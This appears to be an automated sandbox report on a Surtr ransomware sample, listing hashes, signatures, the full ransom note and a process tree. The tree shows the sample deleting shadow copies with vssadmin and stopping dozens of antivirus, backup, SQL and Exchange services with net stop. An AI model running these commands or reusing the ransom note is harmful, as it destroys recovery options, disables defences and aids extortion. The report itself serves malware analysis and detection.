Analysis
-
max time kernel
173s -
max time network
64s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
09-11-2022 16:00
General
-
Target
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
-
Size
333KB
-
MD5
393e9f112cc999ebd9333877bcc7535e
-
SHA1
ed65581b6c3980b3ddf623a4d2f61ce08ce59bdf
-
SHA256
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712
-
SHA512
021116a238f84e003ba6a5817b4d6ed27637ed6bc1d6d424533813d70964953c9deb1c62e94bae89db7c59f09dcc76ee5c92ad66c8e7688cd0d4643bc6d72c83
-
SSDEEP
6144:05qtAQ4n9hFPMRp8wayVlTrsusy6szJzHRhDK:MqtYHU8NqrskxHRhDK
Score
10/10
Malware Config
Extracted
Path
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
Family
surtr
Ransom Note
SurtrRansomware
OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !!
Notice : There is only one way to restore your data read the boxes carefully!
Attention :
Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ...
Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation .
How To Decrypt :
Your system is offline . in order to contact us you can email this address [email protected] use this ID (g3jzqW3IeJy28z) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible
Signatures
-
Detects Surtr Payload 1 IoCs
-
Surtr
Ransomware family first seen in late 2021.
-
UAC bypass 3 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops startup file 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 64 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe"C:\Users\Admin\AppData\Local\Temp\459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4372⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 4373⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"4⤵
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "Sophos Agent"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"2⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"2⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"2⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"2⤵
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"2⤵
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"2⤵
-
C:\Windows\system32\net.exenet stop "AcronisAgent"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"2⤵
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"2⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"2⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"2⤵
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"2⤵
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"2⤵
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"2⤵
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"2⤵
-
C:\Windows\system32\net.exenet stop "EPSecurityService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"2⤵
-
C:\Windows\system32\net.exenet stop "IISAdmin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"2⤵
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"2⤵
-
C:\Windows\system32\net.exenet stop "macmnsvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"2⤵
-
C:\Windows\system32\net.exenet stop "masvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"2⤵
-
C:\Windows\system32\net.exenet stop "MBAMService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"2⤵
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"2⤵
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"2⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"2⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"2⤵
-
C:\Windows\system32\net.exenet stop "McShield"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"2⤵
-
C:\Windows\system32\net.exenet stop "mfemms"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"2⤵
-
C:\Windows\system32\net.exenet stop "mfevtp"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"2⤵
-
C:\Windows\system32\net.exenet stop "MMS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"2⤵
-
C:\Windows\system32\net.exenet stop "mozyprobackup"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"2⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"2⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"2⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"2⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeES"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"2⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"2⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"2⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"2⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"2⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"2⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"2⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"2⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"2⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"4⤵
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"2⤵
-
C:\Windows\system32\net.exenet stop "MySQL80"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"2⤵
-
C:\Windows\system32\net.exenet stop "MySQL57"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"2⤵
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"2⤵
-
C:\Windows\system32\net.exenet stop "PDVFSService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"2⤵
-
C:\Windows\system32\net.exenet stop "POP3Svc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"2⤵
-
